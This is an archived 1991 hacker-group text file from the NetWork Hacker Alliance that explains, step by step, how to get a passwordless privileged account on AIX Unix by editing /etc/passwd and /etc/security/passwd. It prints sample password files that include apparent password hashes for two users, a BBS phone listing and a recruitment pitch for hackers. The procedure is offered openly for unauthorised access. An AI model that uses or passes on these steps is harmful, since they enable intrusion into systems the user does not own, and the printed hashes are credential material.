home *** CD-ROM | disk | FTP | other *** search
/ The Hacker Chronicles - A…the Computer Underground / The Hacker Chronicles - A Tour of the Computer Underground (P-80 Systems).iso / network / nha-005.txt < prev    next >
Text File  |  1992-08-29  |  5KB  |  164 lines

  1.              ___     ___     ___     ___     ___________
  2.             |   \   |   |\  |   |\  |   |\  |           |\
  3.             |    \  |   | | |   | | |   | | |    ___    | |
  4.             |     \ |   | | |   |_|_|   | | |   |\ _|   | |
  5.             |      \|   | | |           | | |   |_|_|   | |
  6.             |   |\      | | |    ___    | | |    ___    | |
  7.             |   | \     | | |   |\ _|   | | |   |\ _|   | |
  8.             |   | |\    | | |   | | |   | | |   | | |   | |
  9.             |   | | |   | | |   | | |   | | |   | | |   | |
  10.             |___| | |___| | |___| | |___| | |___| | |___| |
  11.              \___\|  \___\|  \___\|  \___\|  \___\|  \___\|
  12.  
  13.             - A Production of the NetWork Hacker Alliance INC -
  14.  
  15.                 Members:Inphiniti, Code of Honor, Cobra, Keener
  16.                         Tozai, Phusion Man/The Trip, Static Electricity.
  17.  
  18.                        NHA Member Boards Listing
  19.                        +=+=+=+=+=+=+=+=+=+=+=+=+
  20.      +---------------------+---------------+-------------+---------+
  21.      | Inphiniti's Edge    | 216-662-5115  | NHA *WHQ*   | 24/12   |
  22.      | Project Phusion     | 301-365-9249  | NHA Node 1  | 24/12   |
  23.      | Realm of Chaos      | 516-466-8259  | NHA Node 2  | 24/12   |
  24.      +---------------------+---------------+-------------+---------+
  25.  
  26.  
  27.    Subject: Security features in AIX Unix System.
  28.    Date: 07/24/91 6:00pm EST
  29.    Author: Inphiniti
  30.  
  31.    Comments:  This is a short file that I thought I would release. Since
  32.       the size of the file is not important..
  33.  
  34.  
  35.    AIX Unis system difference in several ways from a normal based Unix system.
  36.  
  37.    AIX has two password files that stores the security information you will
  38.    need to modify to obtain root shell access.
  39.  
  40.    AIX's   Makusr program is one of the worst I have encountered but it will
  41.    give the avererage hacker some trouble.
  42.  
  43.    The account you have must have access to the following two directories..
  44.  
  45.    o - /etc
  46.    o - /etc/security
  47.  
  48.    The first thing you must do is use the on-line mkuser program to make
  49.    yourself an account. Verify that your account is there by CATing the passwd
  50.    file in the /etc directory.  If you made an account name nha01 then it
  51.    should look like this..
  52.  
  53.    --   Sample PASSWD file in /ETC directory
  54.  
  55. root:!:0:0::/:/bin/ksh
  56. daemon:!:1:1::/etc:
  57. bin:!:2:2::/bin:
  58. sys:!:3:3::/usr/sys:
  59. adm:!:4:4::/usr/adm:
  60. uucp:!:5:5::/usr/spool/uucppublic:/usr/lib/uucp/uucico
  61. guest:!:100:100::/usr/guest:
  62. nobody:!:4294967294:4294967294::/:
  63. lpd:!:104:9::/:
  64. nuccp:*:6:0::/u/nuccp:/bin/ksh
  65. LOKI:!:200:1::/u/LOKI:/bin/ksh
  66. demonami:!:7:0::/u/demonami:/bin/ksh
  67. uuad:*:201:1::/u/uuad:/bin/ksh
  68. aa:*:202:1::/u/aa:/bin/ksh
  69. uud:*:8:0::/u/uud:/bin/ksh
  70. uucd:*:9:0::/u/uucd:/bin/ksh
  71. newuser:*:203:1::/u/newuser:/bin/ksh
  72. nha01:!:207:0::/:bin/ksh:/u/nha01
  73.  
  74.  Now if your account is in there then move on you can move onto step
  75.  two..
  76.  
  77.  Next change your directory path to cd /etc/security
  78.  type the passwd file in there and this is what it should look like..
  79.  
  80.    --  Sample PASSWD file from /ETC/SECURITY path
  81.  
  82. root:
  83.         password =
  84.         lastupdate = 679343225
  85.         flags =
  86.  
  87. daemon:
  88.         password = *
  89.  
  90. bin:
  91.         password = *
  92.  
  93. sys:
  94.         password = *
  95.  
  96. adm:
  97.         password = *
  98.  
  99. uucp:
  100.         password = *
  101.  
  102. guest:
  103.         password = *
  104.  
  105. nobody:
  106.         password = *
  107.  
  108. lpd:
  109.         password = *
  110.  
  111. LOKI:
  112.         password = HfgiGq/guu9Uw
  113.         lastupdate = 676654818
  114.         flags =
  115.  
  116. demonami:
  117.         password = BerG7SxkTKd/6
  118.         lastupdate = 676654977
  119.         flags =
  120.  
  121.  
  122.  
  123.   Now run edit the passwd file
  124.  
  125.   # edit passwd
  126.   hit the number of the last line at the : prompt
  127.   then add your new record this way..
  128.  
  129. username:
  130.         password =
  131.         lastupdate = 676654977
  132.         flags =
  133.  
  134.    Note that the password, lastupdate, flags fields must be under each other
  135.    as they are in the orginal passwd file.
  136.  
  137.    Leave the password and flags fields blank and you now have an account
  138.    on AIX Unix..
  139.  
  140.  
  141.     I hope this short file helps some of the unix hackers out there.  Most
  142.    of whom I have talked two have had trouble getting root access for another
  143.    account on AIX Unix based systems.. It worked on mine so I thought I'd
  144.    share it with the public.
  145.  
  146.    NHA Productions 1991
  147.    by Inphiniti
  148.  
  149.           NHA is looking for skilled members to write on other networks
  150.           and just plainly to hack and expand our horizion to meet the
  151.           challenges of the world.  If you think you are qualified then
  152.           apply.  We are not one of those groups that copy text from a
  153.           book and say we are kick ass k-rad..
  154.  
  155.                        -Inphiniti
  156.  
  157.           with this file NHA welcomes the addition of two new members
  158.  
  159.            Static Electricity former LoL/PHUCK(lamer group) Runner
  160.            Tozai              Internet Genius
  161.  
  162.                      Expect the future to unfold with NHA.
  163.  
  164.             n o t   t h a t   o t h e r   n - n a m e d   g r o u p